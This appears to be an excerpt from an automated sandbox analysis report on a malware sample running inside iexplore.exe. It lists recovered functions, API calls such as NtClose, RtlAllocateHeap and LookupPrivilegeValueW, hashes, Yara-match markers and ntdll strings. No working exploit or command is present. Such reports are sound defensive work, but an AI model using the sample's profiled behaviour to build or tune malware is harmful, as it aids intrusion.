                                  • Opcode ID: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
                                  • Instruction ID: 0494ff60b09d4fc21657d6c615b5019aa557bb466eed1ab501d89975e332403b
                                  • Opcode Fuzzy Hash: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
                                  • Instruction Fuzzy Hash: 84E01776600214ABD720EBD9CC85FE77B68EF48764F158499BA1CAB242C534FA118BE0
                                  Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 187 41a480-41a496 188 41a49c-41a4a9 NtClose 187->188 189 41a497 call 41af50 187->189 189->188
                                  APIs
                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                  Function 036F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2096ad5118c44b9fb4b9a6358ce86dcbde879a65b78b47f9330c23369102e3ff
                                  • Instruction ID: 79337e1edaef5a244853b3371171dc31c2ff49e3f26d013ee9f83ffd529657c8
                                  • Opcode Fuzzy Hash: 2096ad5118c44b9fb4b9a6358ce86dcbde879a65b78b47f9330c23369102e3ff
                                  • Instruction Fuzzy Hash: 5E9002A1202804935105B1584454616404A87E0201B55C031E10155E4DC62589916126
                                  Function 036F2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 67810d44f8cad6f98c7778e7263b96630d76829838552fd47a41418a7be1e907
                                  • Instruction ID: 1be121f3de667ab69be433446557e3dcb3c6f0af7c1e4f45531bb8af5254355b
                                  • Opcode Fuzzy Hash: 67810d44f8cad6f98c7778e7263b96630d76829838552fd47a41418a7be1e907
                                  • Instruction Fuzzy Hash: 10900265211804931105F5580744507008687D5351355C031F10165A4CD72189615122
                                  Function 036F2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c7065c0d2ab594fe66bd43d542e82a45d89d5f683aeddfcaffe9cfd8bdfff188
                                  • Instruction ID: ded83bfc236c6b26f22305980cc81f26b503ccc770e693dd0694208e43d43145
                                  • Opcode Fuzzy Hash: c7065c0d2ab594fe66bd43d542e82a45d89d5f683aeddfcaffe9cfd8bdfff188
                                  • Instruction Fuzzy Hash: F29002A1341808D2E100B1584454B060045C7E1301F55C025E10655A8D8719CD526127
                                  Function 036F2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cff07c3a30e96c24644edc45ae49bda81675b43c4502dad38abd82246564e4da
                                  • Instruction ID: 97f1c2f352d932fc18c383cdf4ce9b920a05dce121fd1d5c0ba23a9c012d6d93
                                  • Opcode Fuzzy Hash: cff07c3a30e96c24644edc45ae49bda81675b43c4502dad38abd82246564e4da
                                  • Instruction Fuzzy Hash: B3900261211C04D2E200B5684C54B07004587D0303F55C125A01555A8CCA1589615522
                                  Function 036F2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ed389dfe12b5724fd4f1b08fcaa44cc7d98b759d102f7353a6b06c74d495cdc2
                                  • Instruction ID: fcd0feb234ad322c62723e7c00539b37b3f5165dbc71addeb31614bcc6f03f74
                                  • Opcode Fuzzy Hash: ed389dfe12b5724fd4f1b08fcaa44cc7d98b759d102f7353a6b06c74d495cdc2
                                  • Instruction Fuzzy Hash: 4A900261601804D25140B16888849064045ABE1211755C131A09995A4D865989655666
                                  Function 036F2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a31014dcda0f73afadd4e49c0c03294176a3a9247a48306872abed970b08dac9
                                  • Instruction ID: 5028cbad915ad0fd4789420a665d9416f97c03640b8b2a432dd97b584dcb0676
                                  • Opcode Fuzzy Hash: a31014dcda0f73afadd4e49c0c03294176a3a9247a48306872abed970b08dac9
                                  • Instruction Fuzzy Hash: E19002B120180892E140B1584444746004587D0301F55C021A50655A8E87598ED56666
                                  Function 036F2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 408ced435f0181c771b3920d516dc5bc17bee535f5a633947ab5b74ddb488320
                                  • Instruction ID: eb6bb14dade984ef7323177e29a6ca3e73f3391b32569b6b57e0f224122c747b
                                  • Opcode Fuzzy Hash: 408ced435f0181c771b3920d516dc5bc17bee535f5a633947ab5b74ddb488320
                                  • Instruction Fuzzy Hash: BF90026160180992E101B1584444616004A87D0241F95C032A10255A9ECB258A92A132
                                  Function 036F2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 058b12dcbdf906eddbab7d1ef7564979725976b89179c5059d5947add24adb54
                                  • Instruction ID: 0d995f098a732d775607bef1b2b5ac52d774d86567ecb888c1c31f4a3c06135f
                                  • Opcode Fuzzy Hash: 058b12dcbdf906eddbab7d1ef7564979725976b89179c5059d5947add24adb54
                                  • Instruction Fuzzy Hash: 4090026130180493E140B15854586064045D7E1301F55D021E04155A8CDA1589565223
                                  Function 036F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3136c84d7a0b9452bb55ba4223c410de217813effb50c01d6b0c13705ab4b141
                                  • Instruction ID: f7a9044efe4e68367a8957c3241462d9c8b432829f0f373a5dbf5dd24119eb3c
                                  • Opcode Fuzzy Hash: 3136c84d7a0b9452bb55ba4223c410de217813effb50c01d6b0c13705ab4b141
                                  • Instruction Fuzzy Hash: CC90026921380492E180B158544860A004587D1202F95D425A00165ACCCA1589695322
                                  Function 036F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a176e225eabf3f91faa8cc8c0c3a9070e3a9fe07b41351cda2253552d2144db3
                                  • Instruction ID: 2076f8276ac52bbeeb2ea3001cc97890f45cc04491063b71e94af6ee037b0bfa
                                  • Opcode Fuzzy Hash: a176e225eabf3f91faa8cc8c0c3a9070e3a9fe07b41351cda2253552d2144db3
                                  • Instruction Fuzzy Hash: AF900271201808A3E111B1584544707004987D0241F95C422A04255ACD97568A52A122
                                  Function 036F2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3802dae99973372e55564b019ff1d87fb0ae0fcd04281a38f11d1fb02537ddd1
                                  • Instruction ID: 96c688feab4332c9c7ed1479bc445ac0a8cfd3e783beca71dba3423789f47ac4
                                  • Opcode Fuzzy Hash: 3802dae99973372e55564b019ff1d87fb0ae0fcd04281a38f11d1fb02537ddd1
                                  • Instruction Fuzzy Hash: 8C900261242845E26545F1584444507404697E0241795C022A14159A4C86269956D622
                                  Function 036F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bad7e90a059c2a2be96382f59ca16f311afc47025c9be6961eac704d9c5fa162
                                  • Instruction ID: 754f91869017d83cc07141866772e4e6a40b91088616bf884f9c469326a4002e
                                  • Opcode Fuzzy Hash: bad7e90a059c2a2be96382f59ca16f311afc47025c9be6961eac704d9c5fa162
                                  • Instruction Fuzzy Hash: A090027120188C92E110B158844474A004587D0301F59C421A44256ACD879589917122
                                  Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 928a368d2f55164ef9b6fdd41f721d1cd887d1948ad757b9ca5bddb4dd28d2af
                                  • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                  • Opcode Fuzzy Hash: 928a368d2f55164ef9b6fdd41f721d1cd887d1948ad757b9ca5bddb4dd28d2af
                                  • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                  Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 23 41a620-41a651 call 41af50 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: &EA
                                  • API String ID: 1279760036-1330915590
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                  Function 0041A652 Relevance: 3.0, APIs: 2, Instructions: 37memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitFreeHeapProcess
                                  • String ID:
                                  • API String ID: 1180424539-0
                                  • Opcode ID: 88f434622c633bc27af2c1bf28be723c31b971511076cdf1f3b3b1eadcf465e8
                                  • Instruction ID: 7c62ef2e9c5af210fca229e7e6612a7b87500e0c86a304205cdf82c4a5d7c339
                                  • Opcode Fuzzy Hash: 88f434622c633bc27af2c1bf28be723c31b971511076cdf1f3b3b1eadcf465e8
                                  • Instruction Fuzzy Hash: 48F0F0B1600204AFDB10EF64CC84EEB77A8EF88354F058659F96C5B301DA30EA20CBE4
                                  Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 121 408308-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 130 40835c-40836e PostThreadMessageW 121->130 131 40838e-408392 121->131 132 408370-40838a call 40a470 130->132 133 40838d 130->133 132->133 133->131
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 49dd0526c12ee38ad3e97860b4b091b05898787dd6dc78077bceeb726d5b378c
                                  • Instruction ID: 2a8d323920ff48d12539d15ce7e09ae1efddcc1a1390eeb770c6affd5baa7734
                                  • Opcode Fuzzy Hash: 49dd0526c12ee38ad3e97860b4b091b05898787dd6dc78077bceeb726d5b378c
                                  • Instruction Fuzzy Hash: 7C01B971A4031877EB21A6958C03FFE776CAB40F55F05411DFF04BA1C2D7A9690546E9
                                  Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 136 408310-40831f 137 408328-40835a call 41c9f0 call 40ace0 call 414e40 136->137 138 408323 call 41be50 136->138 145 40835c-40836e PostThreadMessageW 137->145 146 40838e-408392 137->146 138->137 147 408370-40838a call 40a470 145->147 148 40838d 145->148 147->148 148->146
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: f4de9516877f5e66a6906b262a8032ebdb3878444ce067a10c23a558afbe5810
                                  • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                  • Opcode Fuzzy Hash: f4de9516877f5e66a6906b262a8032ebdb3878444ce067a10c23a558afbe5810
                                  • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                  Function 0041A7B1 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 169 41a7b1-41a7b7 170 41a7e9-41a7f4 LookupPrivilegeValueW 169->170 171 41a7ba-41a7bd 169->171 172 41a81a-41a830 call 41af50 171->172 173 41a7bf-41a819 171->173 173->172
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: a941718e14f809540f9cb1fcdd1daa2e2fcc0822d0c77d51cbeff7b1a986ba12
                                  • Instruction ID: c8ee3320983f7650268690fb7534173575ac561414675746a58643d4a70e0bde
                                  • Opcode Fuzzy Hash: a941718e14f809540f9cb1fcdd1daa2e2fcc0822d0c77d51cbeff7b1a986ba12
                                  • Instruction Fuzzy Hash: CFE09AB2605211AFD720EBA8EC858EBF32DEF803647218457F84887201C335D9A287B6
                                  Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 178 41a660-41a676 179 41a67c-41a691 RtlFreeHeap 178->179 180 41a677 call 41af50 178->180 180->179
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                  Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 181 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                  Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 190 41a6a0-41a6c8 call 41af50 ExitProcess
                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5

                                  Non-executed Functions

                                  Function 03732349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  • Opcode ID: 6fc57b9818044062fbe5d7f688c65fc8c3938e3609804933cf168553d37eacba
                                  • Instruction ID: a6cf2613e50d96bc334b08fc672a1c032de826e16ce0982c5f8cb5b1b56a1f1e
                                  • Opcode Fuzzy Hash: 6fc57b9818044062fbe5d7f688c65fc8c3938e3609804933cf168553d37eacba
                                  • Instruction Fuzzy Hash: 5F928A75608741AFE720DF24C880B6BB7E8BB86714F084D2DFA95DB252D770E844CB96
                                  Function 037612ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                  • API String ID: 0-3591852110
                                  • Opcode ID: ba6a95c09d37b6d02920e5a2cef57a3946b775f51a9f16e1dbefda39e1b93f1b
                                  • Instruction ID: 0f7df4abd6188a87ce6c56afd764c8d0271fe8d41114fc924b641a7c496c9c12
                                  • Opcode Fuzzy Hash: ba6a95c09d37b6d02920e5a2cef57a3946b775f51a9f16e1dbefda39e1b93f1b
                                  • Instruction Fuzzy Hash: FD12CC34604642DFC725DF28C469BBAFBF5EF09710F98849DE8968B642D734E880DB90
                                  Function 036AD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                  • API String ID: 0-3532704233
                                  • Opcode ID: dea6cb25a44b3d0895697843a2a5cebf95a69fcad8e2a8068db8b63b00625e09
                                  • Instruction ID: d40f522144d0e0e6545cb20020c35316a7cfa40dca949cee04413650ba3379ab
                                  • Opcode Fuzzy Hash: dea6cb25a44b3d0895697843a2a5cebf95a69fcad8e2a8068db8b63b00625e09
                                  • Instruction Fuzzy Hash: 48B19C725087519FC721DF28C4A0A6FBBE8AB88754F05496EF989DB240D730ED45CF92
                                  Function 03749179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                  • API String ID: 0-3063724069
                                  • Opcode ID: a067cd85a3f7df9adf83347168457e0e5c7dd34429927b055880ec38807c1521
                                  • Instruction ID: ef88c9a8621632c09e521e8bcb55ad8c96ae2e67876e14bbc3fd4373ac484760
                                  • Opcode Fuzzy Hash: a067cd85a3f7df9adf83347168457e0e5c7dd34429927b055880ec38807c1521
                                  • Instruction Fuzzy Hash: F4D1EEB2804351AFD721DB54C840BABF7ECAF86714F054A2DFB94AB250E774ED048B96
                                  Function 03760274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
